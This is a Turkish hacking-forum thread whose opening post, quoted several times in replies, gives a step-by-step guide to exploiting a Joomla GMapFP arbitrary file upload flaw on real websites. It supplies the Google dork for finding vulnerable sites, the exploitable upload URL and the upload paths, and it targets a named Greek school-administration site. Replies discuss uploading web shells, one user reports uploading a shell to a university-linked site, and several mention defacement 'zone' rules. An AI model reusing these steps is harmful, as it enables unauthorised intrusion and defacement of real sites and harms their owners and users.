Web Site Hackleme | Basit File Upluoad

GECEYARASA · 16 Eyl 2022

Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;

Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload - CXSecurity.com

thelastvvv has realised a new security note Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload

cxsecurity.com

Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''

* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "

SİTEYİ SEÇTİM

ΣΧΟΛΕΙΑ ΠΕΥΚΗΣ - ΑΜΑΡΟΥΣΙΟΥ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.

" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.

Böyle olucak şekilde ayarlayalım

ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.

index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

'Gustavo · 16 Eyl 2022

Bu açıkla shell yüklemesi yapmayı denedin mi dostum?

icehead · 16 Eyl 2022

hocam index çakaydık.

GökBörü. · 16 Eyl 2022

GECEYARASA' Alıntı:
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;

Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload - CXSecurity.com

thelastvvv has realised a new security note Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload

cxsecurity.com

Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''

* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "

SİTEYİ SEÇTİM

ΣΧΟΛΕΙΑ ΠΕΥΚΗΣ - ΑΜΑΡΟΥΣΙΟΥ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.

" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.

Böyle olucak şekilde ayarlayalım

ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.

index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.

icehead · 16 Eyl 2022

GökBörü.' Alıntı:
yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.

basit upload açığı diyorsunuz da bu basit dediğin açık baş yarar.
YÖK'e bağlı bir site de aynı açığı yakaladım kendi shell dosyamı attım o filtre geçilebilir.
(mail atıp durumu bildirmiştim.)

GökBörü. · 16 Eyl 2022

icehead' Alıntı:
basit upload açığı diyorsunuz da bu basit dediğin açık baş yarar.
YÖK'e bağlı bir site de aynı açığı yakaladım kendi shell dosyamı attım o filtre geçilebilir.
(mail atıp durumu bildirmiştim.)

bunu ben demiyorum kardeşim gövde gösterisi kuralları diyor
o kısmı okumanı tavsiye ederim.

Extazİ · 16 Eyl 2022

Eline sağlık.

icehead · 16 Eyl 2022

GökBörü.' Alıntı:
bunu ben demiyorum kardeşim gövde gösterisi kuralları diyor
o kısmı okumanı tavsiye ederim.

saçmaymış o zaman ne diyim

GökBörü. · 16 Eyl 2022

icehead' Alıntı:
saçmaymış o zaman ne diyim

buyrun admin olun siz yapın kuralları o zaman

'Lase · 16 Eyl 2022

Eline saglık dostum

ɴᴜʟʟ · 16 Eyl 2022

Eline sağlık başarılar

JohnWick51 · 16 Eyl 2022

GECEYARASA' Alıntı:
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;

Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload - CXSecurity.com

thelastvvv has realised a new security note Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload

cxsecurity.com

Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''

* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "

SİTEYİ SEÇTİM

ΣΧΟΛΕΙΑ ΠΕΥΚΗΣ - ΑΜΑΡΟΥΣΙΟΥ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.

" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.

Böyle olucak şekilde ayarlayalım

ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.

index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

Ellerine saglik

GECEYARASA · 17 Eyl 2022

'Gustavo' Alıntı:
Bu açıkla shell yüklemesi yapmayı denedin mi dostum?

derslerimde olması lazım konu uzun olmaması için eklemedim #2 eklerim onuda

icehead' Alıntı:
hocam index çakaydık.

hocam url konusunda yanılma olmasın diye en basit yöntemiyle anlattım isteyen index de çakar

Alexxb' Alıntı:
Eline sağlık.

teşekkürler

GökBörü.' Alıntı:
yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.

merakı olup en baştan başlamak isteyenler için iyi bir giriş onun harici ummadık yerden neler çıkar hocam ama dediğiniz gibi kayda değer değiller tabi ki

'Lase' Alıntı:
Eline saglık dostum

teşekkürler

JohnWick51' Alıntı:
Ellerine saglik

teşekkürler

ɴᴜʟʟ' Alıntı:
Eline sağlık başarılar

teşekkür ederim hocam

THE_V · 17 Eyl 2022

GECEYARASA' Alıntı:
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;

Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload - CXSecurity.com

thelastvvv has realised a new security note Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload

cxsecurity.com

Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''

* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "

SİTEYİ SEÇTİM

ΣΧΟΛΕΙΑ ΠΕΥΚΗΣ - ΑΜΑΡΟΥΣΙΟΥ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.

" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.

Böyle olucak şekilde ayarlayalım

ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ

Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας

dide-v-ath.gr

Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.

index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

Eline sağlık ben bunu bir deniyeyim

"KARAHANLI" · 17 Eyl 2022

eline sağlık

GökBörü. · 17 Eyl 2022

GECEYARASA' Alıntı:
merakı olup en baştan başlamak isteyenler için iyi bir giriş onun harici ummadık yerden neler çıkar hocam ama dediğiniz gibi kayda değer değiller tabi ki

Heh sonunda anlayan birisi çıktı ben dedimki orda sadece gövde açık olsaydı kabul edilmezdi yoksa tabi ummadık taş baş yarar nerelerden nasıl configler çıktı

Eline sağlık

Chester Hoca · 17 Eyl 2022

Eline sağlık, güzel anlatım.

The VODKA · 17 Eyl 2022

Eline Sağlık.

1wexter1 · 17 Eyl 2022

Eline emeğine sağlık.

GECEYARASA · 17 Eyl 2022

MuammerCan' Alıntı:
eline sağlık

teşekkürler

Web Site Hackleme | Basit File Upluoad

Üye

Nature Cannot Be Controlled

Uzman üye

Uzman üye

Uzman üye

Uzman üye

Moderatör

Uzman üye

Uzman üye

Üye

Katılımcı Üye

Uzman üye

Üye

Yeni üye

Kıdemli Üye

Uzman üye

Katılımcı Üye

Uzman üye

Katılımcı Üye

Üye